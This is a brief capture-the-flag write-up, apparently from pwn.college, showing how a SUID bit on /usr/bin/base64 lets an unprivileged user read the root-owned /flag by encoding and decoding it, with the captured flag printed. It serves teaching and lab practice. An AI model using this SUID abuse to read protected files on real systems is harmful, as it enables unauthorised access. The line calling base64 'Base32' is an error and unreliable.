🧠 Summary:

The challenge abuses a SUID bit set on /usr/bin/base64, allowing an unprivileged user to read the root-owned flag file at /flag.

πŸ” Enumeration

ls -l /usr/bin/base64

output:

-rwsr-xr-x 1 root root 47480 Sep  5  2019 /usr/bin/base64

-The s in -rws indicates it’s a SUID binary. -base64 runs with root privileges.

πŸš€ Exploitation

The base64 command lets you encode or decode data using Base32, a binary-to-text encoding scheme that uses 64 ASCII characters.

myflag=$(base64 /flag)
echo "$myflag" | base64 --decode

Output:

pwn.college{AIjzli7yf5eprqW3oN8f1QhQ1LX.ddTNxwSM0IzMyEzW}
